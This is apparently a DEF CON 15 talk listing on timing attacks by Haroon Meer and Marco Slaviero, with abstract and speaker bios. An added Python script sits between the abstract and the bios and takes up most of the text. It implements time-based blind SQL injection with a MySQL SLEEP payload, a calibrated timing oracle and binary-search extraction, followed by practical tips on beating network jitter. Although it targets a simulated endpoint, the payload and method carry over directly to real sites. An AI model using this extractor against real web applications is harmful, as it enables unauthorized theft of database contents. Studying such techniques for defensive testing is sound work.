DEF CON 15 - Meer and Slaviero - It's All About the Timing
Published on Feb 4, 2014

Haroon Meer & Marco Slaviero: It's All About the Timing

Timing attacks have been exploited in the wild for ages. In recent times timing attacks have largely been relegated to use only by cryptographers and cryptanalysts. In this presentation SensePost analysts will show that timing attacks are still very much alive and kicking on the Internet and fairly prevalent in web applications (if only we were looking for them). The talk will cover SensePost-aTime (our new SQL injection tool that operates purely on timing differences to extract data from injectable sites behind draconian firewall rulesets), our new generic (timing-aware) web brute-forcer and lots of new twists on old favourites. We will discuss the implications of timing for current JavaScript malware, introducing XSRT (Cross Site Request Timing) (because we can never have too many acronyms!), and will demonstrate how reasonably effective this is against the Same Origin Policy.

If you are doing testing today, and are not thinking a lot about timing, chances are you are missing attack vectors right beneath your stop-watch!
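The core mechanism behind a timing-only SQL injection tool, shown as an added example that is not the SensePost-aTime code and not taken from the talk: a response that arrives noticeably later than the baseline is treated as a "true" answer, and one bit of the secret is recovered per answer. Everything below is constructed for illustration; the MySQL-style `SLEEP()` payload, the `password` column, the secret value, the baseline latency and the jitter figures are all assumptions, and the simulated backend stands in for a real HTTP request timer.

```python
import random
import re
import statistics

# Constructed target state (hypothetical): what a MySQL-style backend would hold.
SECRET = "s3cr3t"       # value the attacker cannot read directly
BASELINE_MS = 120.0     # assumed normal round-trip time
JITTER_MS = 40.0        # assumed network/server noise on top of the baseline
SLEEP_SECONDS = 1       # delay injected for a true condition


def build_payload(pos, threshold, sleep_s=SLEEP_SECONDS):
    """Injected fragment: the true branch sleeps, the false branch returns at once.
    The column name 'password' is an assumption for this example."""
    return (f"' AND IF(ASCII(SUBSTRING(password,{pos},1))>{threshold},"
            f"SLEEP({sleep_s}),0)-- ")


def simulated_request(payload, rng):
    """Simulated injectable endpoint (constructed): evaluates the injected
    condition against SECRET and returns an elapsed time in milliseconds,
    with random jitter, as a real stopwatch around an HTTP call would."""
    m = re.search(r"SUBSTRING\(password,(\d+),1\)\)>(\d+),SLEEP\((\d+)\)", payload)
    pos, thr, sleep_s = int(m.group(1)), int(m.group(2)), int(m.group(3))
    elapsed = BASELINE_MS + rng.uniform(0, JITTER_MS)
    # MySQL: SUBSTRING past the end yields '' and ASCII('') is 0, so the
    # condition is false once we run off the end of the secret.
    if pos <= len(SECRET) and ord(SECRET[pos - 1]) > thr:
        elapsed += sleep_s * 1000
    return elapsed


def calibrate(request, rng, samples=5):
    """Measure the no-delay latency with a condition that can never be true
    (an ASCII value is never > 255), so the decision threshold adapts to
    the target instead of being hard-coded."""
    times = [request(build_payload(1, 255), rng) for _ in range(samples)]
    return statistics.median(times)


def condition_true(pos, threshold, request, rng, decision_ms, samples=3):
    """Timing oracle: take several samples and use the median so that a
    single jittery response does not flip a bit."""
    times = [request(build_payload(pos, threshold), rng) for _ in range(samples)]
    return statistics.median(times) > decision_ms


def extract_char(pos, request, rng, decision_ms):
    """Binary search over the 7-bit ASCII range: 7 oracle answers per character."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if condition_true(pos, mid, request, rng, decision_ms):  # char > mid ?
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(request, rng, max_len=32):
    """Recover the secret character by character; ASCII 0 marks the end."""
    decision_ms = calibrate(request, rng) + SLEEP_SECONDS * 1000 / 2
    out = []
    for pos in range(1, max_len + 1):
        c = extract_char(pos, request, rng, decision_ms)
        if c == 0:
            break
        out.append(chr(c))
    return "".join(out)


def run_demo(seed=1):
    """Run the extraction against the simulated endpoint with a seeded RNG."""
    return extract(simulated_request, random.Random(seed))


if __name__ == "__main__":
    print(run_demo())  # recovers the constructed SECRET
```

The two details that matter in practice are the calibration step (the baseline must be measured on the target, not assumed) and the median over repeated samples, which is what lets the technique survive real network jitter; the ratio between the injected delay and the observed jitter decides how many samples are needed.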

Haroon Meer is the Technical Director of SensePost. He joined SensePost in 2001 and has not slept since his early childhood. He has co-authored several technical books on Information Security and has spoken and trained at conferences around the world. He has played in most aspects of IT Security from development to deployment and currently gets his kicks from reverse engineering, application assessments and similar forms of pain.

Marco Slaviero is a senior security analyst, avid reader and recovering student. He is currently a PhD candidate and a valuable member of SensePost's Security Assessment team. He doesn't smoke and is rumoured to harbour personal animosity towards figs.